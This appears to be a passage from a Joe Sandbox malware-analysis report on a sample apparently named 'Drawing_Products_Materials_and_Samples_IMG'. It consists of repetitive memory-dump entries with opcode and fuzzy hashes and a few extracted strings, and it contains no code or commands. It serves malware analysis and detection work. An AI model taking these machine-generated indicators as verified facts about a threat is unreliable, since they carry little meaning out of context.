                                                                                      • Opcode Fuzzy Hash: 0d77bac7913b10874ca37306d7e00daa139301442107c5e0babb18c820ed7d26
                                                                                      • Instruction Fuzzy Hash: 9281A274E01218CFEB18DFAAD984ADDFBF2BF89300F149069E419AB265DB345981DF50
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 0oOo$LjOo$LjOo
                                                                                      • API String ID: 0-2898272262
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 7'e=$77b=
                                                                                      • API String ID: 0-1236949558
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: p]q
                                                                                      • API String ID: 0-2967776592
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 4
                                                                                      • API String ID: 0-4088798008
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22114996558.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_110000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150954301.00000000373D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 373D0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_373d0000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 8ed3772b0f6d0a0128326d2f8e867a8adeace890d85fb1a30095a200da14836f
                                                                                      • Instruction ID: 90dfb961fee63ba879b0f85452a8823d00714b7a8cabcbe3f774b91e5864ba57
                                                                                      • Opcode Fuzzy Hash: 8ed3772b0f6d0a0128326d2f8e867a8adeace890d85fb1a30095a200da14836f
                                                                                      • Instruction Fuzzy Hash: CBD19F74E013188FEB54DFA9C990B9DBBB2BF89300F2081A9D409BB354DB355A82DF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 4003580ba156f82eed41dbe072d028e9910e4e1e6471e3358eb99e767fcd432c
                                                                                      • Instruction ID: b3b44f9e203d87f1bb44e4cdc6e63d83e746a615c469b8058ecba38bc0dd396d
                                                                                      • Opcode Fuzzy Hash: 4003580ba156f82eed41dbe072d028e9910e4e1e6471e3358eb99e767fcd432c
                                                                                      • Instruction Fuzzy Hash: 75C1AE74E01318CFEB54DFA5C944B9DBBB2BF89305F2081A9D809AB354DB359A86CF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: cd10a1b302b7966606ac0289548769fe733ddf2e3f68eeb63b83a60d6d6d7bbc
                                                                                      • Instruction ID: c6cceb9d9ff30b4fa90a48225cf6eb4d77e095a4b86f65348ed77fe37c6303fc
                                                                                      • Opcode Fuzzy Hash: cd10a1b302b7966606ac0289548769fe733ddf2e3f68eeb63b83a60d6d6d7bbc
                                                                                      • Instruction Fuzzy Hash: CDC1B074E04318CFEB54DFA5C984B9DBBB2BF89304F2081A9D809AB355DB359A81DF14
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: f7822677040ca5d3eb00780c8d03ce12f021f7df2f6696a298d85b8f24391dce
                                                                                      • Instruction ID: de51e763854812d82dfcac102f0fd5ac3405012c81eaf61e01c7857b6f94de80
                                                                                      • Opcode Fuzzy Hash: f7822677040ca5d3eb00780c8d03ce12f021f7df2f6696a298d85b8f24391dce
                                                                                      • Instruction Fuzzy Hash: 50915175E10215DFEB14AFB0D8587EEBBB2EB06756F00542AD102772D1CBB88A86CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 48c976397ca0ac1ac9c356bc612799b4831c09056b9f29ec99caca9e7546def7
                                                                                      • Instruction ID: 5e110d27149cae0733ebd7dd55f7c6120ded2912dd2365143d554847bb4fb029
                                                                                      • Opcode Fuzzy Hash: 48c976397ca0ac1ac9c356bc612799b4831c09056b9f29ec99caca9e7546def7
                                                                                      • Instruction Fuzzy Hash: 80A1E074D102088FEB14DFA9C984BDDBBF1FF89304F208269E409AB292DB759985CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 3402c5ac6d9e15e32d782bb00cc13d4dc5b3830ebd930a2593d9406237a1c225
                                                                                      • Instruction ID: 15039e8997c25dffdce7d11510d4189cba7434de1b034d19af567b67905253f2
                                                                                      • Opcode Fuzzy Hash: 3402c5ac6d9e15e32d782bb00cc13d4dc5b3830ebd930a2593d9406237a1c225
                                                                                      • Instruction Fuzzy Hash: 69A1E371D106198EDB14DFA9C844BDDFBF1EF89304F20C2AAD4186B261EB709A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0ff3f08890561881016a2a79676334cdb6b20b41a45db8d743cb212a18aaf28
                                                                                      • Instruction ID: 0f7f34c8b91432179bdd80b5c91b83a9814637998b23268052a0f6c6a66288e0
                                                                                      • Opcode Fuzzy Hash: e0ff3f08890561881016a2a79676334cdb6b20b41a45db8d743cb212a18aaf28
                                                                                      • Instruction Fuzzy Hash: CEA1D074D102088FEB14DFA9C944BDDBBF1FF89314F208269E409AB291DB749985CF59
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c981e51c402097ac279aa180a8966d7d20e381cbfc50a669d96d8a7fbc076cdb
                                                                                      • Instruction ID: cef6ad53675f2c5272d4dc00145f29581a407c7f1420d245c55a327630774fbf
                                                                                      • Opcode Fuzzy Hash: c981e51c402097ac279aa180a8966d7d20e381cbfc50a669d96d8a7fbc076cdb
                                                                                      • Instruction Fuzzy Hash: 2DA192B5E012288FEB64DF6AC944BDDBBF2BF89300F14C1A9D808A7254DB345A85CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 5c9d8f49f0b30a5ee8afaa1e8f470c7c4cfc2c24c6a83e5d076b55e0eb843fdb
                                                                                      • Instruction ID: ef920d535aec4b36dd78cee24d1e79ec6941d44ba8f1c8d2bbf5e0674f4684a8
                                                                                      • Opcode Fuzzy Hash: 5c9d8f49f0b30a5ee8afaa1e8f470c7c4cfc2c24c6a83e5d076b55e0eb843fdb
                                                                                      • Instruction Fuzzy Hash: 2BA19475E01228DFEB58DF6AC944B9DBBF2BF89300F14C1AAD408A7250DB745A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dbb44701a0ce81526317b83503a5912b57cedf921bb8b3a7ea6ba43f00a4b187
                                                                                      • Instruction ID: a7f3147fd567ef42e218c9605444671b9d3cb1f9eb6ae240a60730497e2a4ef5
                                                                                      • Opcode Fuzzy Hash: dbb44701a0ce81526317b83503a5912b57cedf921bb8b3a7ea6ba43f00a4b187
                                                                                      • Instruction Fuzzy Hash: 33A182B5E01218DFEB68DF6AC944B9DBBF2AB89300F14C1AAD408A7250DB745A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: eef9ed33d0fbd6c955e18c44867ea72c41d618e7a3563496524f2af26865b720
                                                                                      • Instruction ID: 68142b1d5dabc94203ece85b780a62d9ee97d1463c83aff9bb156941b603a5e2
                                                                                      • Opcode Fuzzy Hash: eef9ed33d0fbd6c955e18c44867ea72c41d618e7a3563496524f2af26865b720
                                                                                      • Instruction Fuzzy Hash: 6DA19775E01228DFEB58DF6AC944B9DBBF2BF89301F14C1AAD408A7250DB345A85CF11
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e0caf76013a36ad7c2136281bacc16b56575f183e1c4098ec23991146b9a543b
                                                                                      • Instruction ID: 142ac2c4e26ca0e77b65c36020ee3b94c11e0cb3520d5522939a9831fe2c025b
                                                                                      • Opcode Fuzzy Hash: e0caf76013a36ad7c2136281bacc16b56575f183e1c4098ec23991146b9a543b
                                                                                      • Instruction Fuzzy Hash: C6A173B5E012189FEB68DF6AC944B9DBBF2AB89300F14C1AAD40CA7250DB345A85CF55
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9bb9093fd38b3901473d80ad100928d1366119b83c56269d6e81a9100342f11b
                                                                                      • Instruction ID: f9ad9a048a237e3a726ed6aa6af0006d570f61d1b0e6cb6777d22b6dad130091
                                                                                      • Opcode Fuzzy Hash: 9bb9093fd38b3901473d80ad100928d1366119b83c56269d6e81a9100342f11b
                                                                                      • Instruction Fuzzy Hash: E0A1A474E052289FEB68CF6AC944B9DBBF2BF89300F14C1AAD40CA7250DB745A85CF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 2b1222e194d818dec690343d655acfb5cd4db703b36a98d2def99beaea7071f2
                                                                                      • Instruction ID: 944fa2d66efa19d50145d50a93fff3a916dca1772045b862d8b03166a8e12bb7
                                                                                      • Opcode Fuzzy Hash: 2b1222e194d818dec690343d655acfb5cd4db703b36a98d2def99beaea7071f2
                                                                                      • Instruction Fuzzy Hash: BCA182B5E012288FEB64DF6AC944BD9BBF2BF89300F14C1A9D808A7254DB745A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c38c113b343aa36280026878f61e7c6c4539c3c3114ac11bfd13d67364427c13
                                                                                      • Instruction ID: fe1accfdf49c3667686bea458dc64b324288d19100bc2b415b72f2120d091d71
                                                                                      • Opcode Fuzzy Hash: c38c113b343aa36280026878f61e7c6c4539c3c3114ac11bfd13d67364427c13
                                                                                      • Instruction Fuzzy Hash: 4AA19475E01228DFEB68DF6AC944B9DBBF2BF89301F14C1AAD408A7250DB345A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37580000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b46bff210992d33ece722ed33445180a5c8be9c153ec29e1f24283f514c800f8
                                                                                      • Instruction ID: a295955a9858591965ed310e1731093237cfc9046b33866d4deebfcded535172
                                                                                      • Opcode Fuzzy Hash: b46bff210992d33ece722ed33445180a5c8be9c153ec29e1f24283f514c800f8
                                                                                      • Instruction Fuzzy Hash: FEA19475E01228DFEB68DF6AC944B9DBBF2BF89300F14C1AAD408A7250DB745A85CF51
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150235357.0000000036A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 36A90000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_36a90000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0457aed3fe4804f1b74a90427c611cb962a6ca94cece0d3f227a399ae49f7f87
                                                                                      • Instruction ID: 1b0f5ae02e582716bf94d73dcb351a26be9438b95e966f88ba3f32e54d6df207
                                                                                      • Opcode Fuzzy Hash: 0457aed3fe4804f1b74a90427c611cb962a6ca94cece0d3f227a399ae49f7f87
                                                                                      • Instruction Fuzzy Hash: 2591CD74D102188FEB50DFA9C984BDCBBF1FF89314F208269E409AB291DB759985CF58
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d483af579626ba7442eea8a5d2cba4844de5138f260305a7d0742b8d54921e04
                                                                                      • Instruction ID: 78b6e278515a5f34ec46dcc424e191e97ba347fe52b17c71deb5afe33e65b261
                                                                                      • Opcode Fuzzy Hash: d483af579626ba7442eea8a5d2cba4844de5138f260305a7d0742b8d54921e04
                                                                                      • Instruction Fuzzy Hash: A791B274E00218CFEB54DFA9C990ADDBBB2BF89300F648129D815BB354DB356946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151214905.0000000037410000.00000040.00000800.00020000.00000000.sdmp, Offset: 37410000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37410000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c724f18fa50e9e9ed7f13f23b71487e0a1051ba536ca6315c3fb102ac910ca8e
                                                                                      • Instruction ID: 7e5b7a278184ef98551a2cb890f2f12af60cf8ee9208a6a4ba817aee2f2ab610
                                                                                      • Opcode Fuzzy Hash: c724f18fa50e9e9ed7f13f23b71487e0a1051ba536ca6315c3fb102ac910ca8e
                                                                                      • Instruction Fuzzy Hash: 8E91A274E00218CFEB54DFA9C990ADDBBB2BF89310F608129D805BB354DB35A946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a195cd5fbec2d5530a69daad1250118346d7ccdf13819f3381a67163d2ab3ad0
                                                                                      • Instruction ID: 4bc74d4de3a25d39361f82d22b1158de07b87b4ab0454b8fb1ebfdd20eed482e
                                                                                      • Opcode Fuzzy Hash: a195cd5fbec2d5530a69daad1250118346d7ccdf13819f3381a67163d2ab3ad0
                                                                                      • Instruction Fuzzy Hash: D291A074E04218CFEB54DFA9C990AEDBBB2BF89300F608129D815BB358DB356946CF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151145187.0000000037400000.00000040.00000800.00020000.00000000.sdmp, Offset: 37400000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37400000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a8c5aa991aadf23ba36c9b834a5aca356c94ed0bb2f563adeea87514e338cb56
                                                                                      • Instruction ID: 83a5462cf7d96d98d0ed0e5529da0bd780e4ab91c747b7cdc1e61d5b5eedcc03
                                                                                      • Opcode Fuzzy Hash: a8c5aa991aadf23ba36c9b834a5aca356c94ed0bb2f563adeea87514e338cb56
                                                                                      • Instruction Fuzzy Hash: 9391A174E00218CFEB54DFA9C990ADDBBB2BF89300F648129D805BB358DB356986DF54
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a64f8aed2256e6e190c992ef8cbbd248c99221c84a50af20cfd28f9a58bb20fe
                                                                                      • Instruction ID: 5feb934a95f76e0faa095354ef2f97f1324368e6334d782ddb9f0b04188f393a
                                                                                      • Opcode Fuzzy Hash: a64f8aed2256e6e190c992ef8cbbd248c99221c84a50af20cfd28f9a58bb20fe
                                                                                      • Instruction Fuzzy Hash: 3D81B1B4E003188FDB58CFAAD9987DDBBF2BF89304F20816AD419AB254DB345985DF50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22150817508.0000000037360000.00000040.00000800.00020000.00000000.sdmp, Offset: 37360000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_2_2_37360000_Drawing_Products_Materials_and_Samples_IMG.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 73bd88fa0f9f9a7b8fb0d3f9cf753007fdf6ce29ea5929c22cb6b3507c5ff884
                                                                                      • Instruction ID: e8861d3b19cd456d04109e777201e892c6f4e95e892d565722aad7ed0c77b6ad
                                                                                      • Opcode Fuzzy Hash: 73bd88fa0f9f9a7b8fb0d3f9cf753007fdf6ce29ea5929c22cb6b3507c5ff884
                                                                                      • Instruction Fuzzy Hash: 2A61E975E012089FEB14DFE9D984BDDFBF6AF89314F14C129E808AB359EA319901CB50
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000002.00000002.22151341097.0000000037580000.00000040.00000800.00020000.00000000.sdmp, Offset: 37580000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
